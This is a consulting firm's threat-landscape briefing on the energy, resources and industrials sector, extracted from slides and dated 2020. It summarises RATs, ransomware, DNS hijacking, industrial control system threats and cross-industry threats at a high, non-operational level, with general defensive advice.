Energy Resources & Industrials

Recent observations

Global Threat Assessment by Deloitte Global C yber Threat Intelligence.

& trends

Issue date: September 2020 | Industry: ERI | Region: All

Copyright © 2019 Deloitte Development LLC. All rights reserved.
Threat Landscape | Energy and Resources

Executive summary
The Energy, Resources, and Industrials sector (ERI) is exposed to multiple types of risks across
the cyber threat landscape. The ERI sector is composed of organizations in the power and
utilities, oil and gas, industrial control systems (ICS), construction, as well as the mining and
minerals industries. The ERI sector is a target for multiple types of threat actors and will
continue to be a substantial target due to the sector holding a significant role in critical
infrastructure as well as the key economic importance of services in these industries. Deloitte
has observed two primary motives behind threat actor targeting and will explore five core
threats targeting the ERI Industry.

Threat actors Motives Core threats

Cyber espionage: Nation-

state threat actors seek
economic, political, and Remote Access
military advantages by Trojans (RATs)
stealing proprietary
information and exploiting
Advanced persistent vulnerable entities in the ERI Ransomware
threat (APT) industry. By stealing
sensitive proprietary data,
R&D costs and schedules can
be reduced significantly due DNS Hijacking
to utilizing the work already
done by the victim.
Financial gain: Threat Threats to Industrial
actors operating within the Control Systems
underground criminal (ICS)
Cyber criminals ecosystem obtain access to
ERI target networks sell Cross-industry
access to sensitive threats
proprietary and customer
2
Copyright © 2019 Deloitte Development LLC. All rights reserved. data of ERI organizations
Threat Landscape | Technology, Media, and Telecommunications
Observation 1 | Remote Access Trojans (RATs)
Copyright © 2019 Deloitte Development LLC. All rights reserved.
A variety of threat actors use custom built and commodity RATs to strategically target organizations in
the ERI industry and beyond to access client data or networks.
____________
Threat actor
State-sponsored actors: State-sponsored threat actors use both custom built and commodity RATs that
give the threat actors the capability to target organizations within the ERI industry in state-sponsored
campaigns and attacks.
Cyber criminals: Cyber criminals use commodity RATs to steal access credentials and other sensitive or
proprietary data to sell on underground forums and marketplaces for financial gain.
Threat motivator
Cyber espionage: Threat actors focused on targeting the ERI sector mainly do so to obtain sensitive
proprietary data. State-sponsored threat actors or APT groups target sensitive proprietary data to
improve their own infrastructure and programs within the ERI sector. One of the benefits of cyber-
espionage, especially in the industrial sectors, is that R&D can be reduced significantly due to utilizing
the work already done by the victim.
Financial gain: Cyber criminal threat actors target the networks and sensitive proprietary data of ERI
organizations to sell access or data on Dark Web underground forums.
Lessons learned
ERI organizations will remain a target of advanced threat actors, not only for their sensitive data, but
also because they can be leveraged to impact critical infrastructure.
Tactics, techniques, & procedures
Targeted spear phishing campaigns typically result in the delivery of RATs, which enable persistent
access as well as lateral movement. Credential-based attacks on exposed remote services RDP are also
popular for initial access. Threat actors seek to compromise account credentials, particularly for
administrators, to enable lateral movement and to ultimately gain access to the critical infrastructure of
ERI organizations as well as their sensitive proprietary data. Legitimate tools and techniques, such as
PowerShell, can enable actors to evade many detective controls. 3
Threat Landscape | Technology, Media, and Telecommunications

Observation 2 | Ransomware
In a ransomware attack, threat actors seek to encrypt victim machines and networks for either financial
gain or destructive purposes. Ransomware is used by a variety of threat actors across all industries and
will likely continue to be used to target organizations in the ERI sector in the future.

____________

Threat actor
State-sponsored actors: State-sponsored threat actors are capable of conducting successful attacks
using ransomware for the purposes of disrupting or destroying targeted networks. In these cases there
is typically no decryption key available.

Cyber criminal actors: Cyber criminal threat actors are capable of encrypting victim machines and
networks, and target organizations and victims that will give them the maximum financial gain.

Threat motivator
Financial gain: The critical infrastructure of the ERI sector represents opportunistic targeting for threat
actors using ransomware who are motivated by financial gain.

Destructive purposes: The critical infrastructure of the ERI sector represents specific targeting for threat
actors repurposing ransomware for destructive purposes. State sponsored actors may use ransomware
with no intention of ever providing the decryption key or even using code that does not produce a
decryption key.

Lessons learned
Ransomware can be used to target organizations in the ERI sector and will continue to be used by
threat actors to impact the sector for destructive purposes in addition to financial gain. All companies
and organizations should be aware of and understand how ransomware could impact their corporate
machines and networks.

Tactics, techniques, & procedures

For ransomware attacks, spear phishing emails are the main vector of attack.

Copyright © 2019 Deloitte Development LLC. All rights reserved.

4
Threat Landscape | Technology, Media, and Telecommunications

Observation 3 | DNS Hijacking

DNS (Domain Name System) hijacking attacks target domain name server records in order to point
victims towards rogue infrastructure that imitate mail, VPN, and other remote services.

____________

Threat actor
State-sponsored actors: DNS hijacking targets and incidents reflect the continued escalation and
sophistication of nation state cyber espionage/warfare from both a strategy and capability standpoint.

Threat motivator
Cyber espionage: DNS hijacking attacks focus on impacting many victims at once. Threat actors use
these attacks to accomplish redirecting as many victims as possible to sites that install malware on
victim machines and systems, as well as steal credentials.

Lessons learned
DNS hijacking attacks are man-in-the-middle (MitM) attacks and used to harvest credentials, often
mirroring traffic and redirecting to the legitimate host. Always update and patch. Don’t click on
suspicious links in emails or on social media and make sure the default admin username/password for
the router is changed. Avoid using public Wi-Fi networks to send or receive personal information, or to
log into sites that require a password or username. Implement Domain Name System Security
Extensions (DNSSEC) on all machines. This is an industry-wide security standard allowing domain
owners to monitor traffic on their own domains and check for suspicious activity. They are also able to
register their Domains’ zones, enabling DNS resolvers to verify the authenticity of all DNS responses.
Using a VPN will bypass router settings and perform DNS lookups automatically.

Tactics, techniques, & procedures

Threat actors utilize DNS hijacking to impact the maximum amount of victims. Once threat actors have
control of the DNS, they redirect victims to a compromised website or system owned by threat actors
that appears legitimate but contains malware or advertisements that steal sensitive proprietary data or
account credentials.

Copyright © 2019 Deloitte Development LLC. All rights reserved. 5

Threat Landscape | Technology, Media, and Telecommunications

Observation 4 | Threats to Industrial Control Systems (ICS)

ICS used in ERI processes are becoming more sophisticated and interconnected, which makes ICS more
vulnerable to attack as sensors and controllers continue to be linked to enterprise networks and the
public internet, in efforts to make operations more convenient and efficient. These efforts have actually
significantly increased risk to ICS by establishing pathways for remote access to critical systems.

____________

Threat actor
State-sponsored actors: State-sponsored threat actors utilize industrial control systems (ICS) themed
lures to deliver RATs to ERI organizations.

Threat motivator
Service disruption, destruction, and cyber espionage: State-sponsored threat actors involved in
campaigns targeting ICS in the ERI sector focus on disrupting or destroying critical infrastructure ICS
networks and devices. Additionally, theft of sensitive proprietary data is a motivator for these actors.

Lessons learned
Efforts to make ICS more sophisticated and interconnected for use among organizations in the ERI
sector have significantly increased risk by establishing pathways for remote access to critical systems.

Tactics, techniques, & procedures

State-sponsored campaigns often use malicious attachments that appear to be ICS themed, as well as
watering holes, and publicly available remote access tools, to deliver malware. Campaigns requiring
long-term access include the use of RATs and other tools to collect information—or alter content—and to
move laterally within a network. Some threat actors may seek to disrupt the availability of ICS in the
ERI sector, for instance through the use of Denial-of-Service (DoS) attacks against critical ERI
infrastructure, as observed in the alleged Iranian threat group Parastoo cyber attack in early June 2019
that caused a power outage in Saudi Arabia after an attack on SCADA systems.

Copyright © 2019 Deloitte Development LLC. All rights reserved. 6

 Observation 5 | Cross-industry threats

ERI organizations face numerous cross-industry threats which include information stealing malware,
threats to cloud services, and supply chain attacks.

____________

Threat actor
Cyber criminals & APTs: Both types of threat actors utilize information stealing malware, supply chain
attacks, and targeting of cloud services to target cross-industry networks and data, including the ERI
sector, to fulfill their respective agendas.

Threat motivator
Financial gain & cyber espionage: ERI organizations process sensitive proprietary data, which cyber
criminals seek to monetize on the dark web or underground forums. The same sensitive data is also
targeted by state-sponsored threat actors to support national intelligence collection requirements or
gain competitive market advantages.

Lessons learned
Organizations in the ERI sector continue to be attractive targets to cyber criminals and state-sponsored
threat actors across all industries and geographic regions due to the unique information they possess.
As such, they are constantly confronted by both commodity and sophisticated cyber threats.

Tactics, techniques, & procedures

The majority of observed attacks on organizations within the ERI sector involve spear-phishing emails
using themed document lures with embedded malware or redirections to login pages designed to steal
user credentials or deliver additional malware. RATs and information stealers are often combined with
“living off the land” abuse of legitimate operating system utilities as actors seek to move laterally
through a victim network, maintain persistent access, and exfiltrate data. Valid accounts remain of
value throughout the entire intrusion lifecycle.

Copyright © 2019 Deloitte Development LLC. All rights reserved.

 This presentation contains general information only and Deloitte is not, by means of this presentation, rendering
accounting, business, financial, investment, legal, tax, or other professional advice or services. This presentation is not a
substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may
affect your business. Before making any decision or taking any action that may affect your business, you should consult a
qualified professional advisor.

Deloitte shall not be responsible for any loss sustained by any person who relies on this presentation.

As used in this document, “Deloitte” means Deloitte & Touche LLP, a subsidiary of Deloitte LLP. Please see www.deloitte.com/u s/about for a detailed
description of our legal structure. Certain services may not be available to attest clients under the rules and regulations o f public accounting.

Copyright © 2019 Deloitte Development LLC. All rights reserved.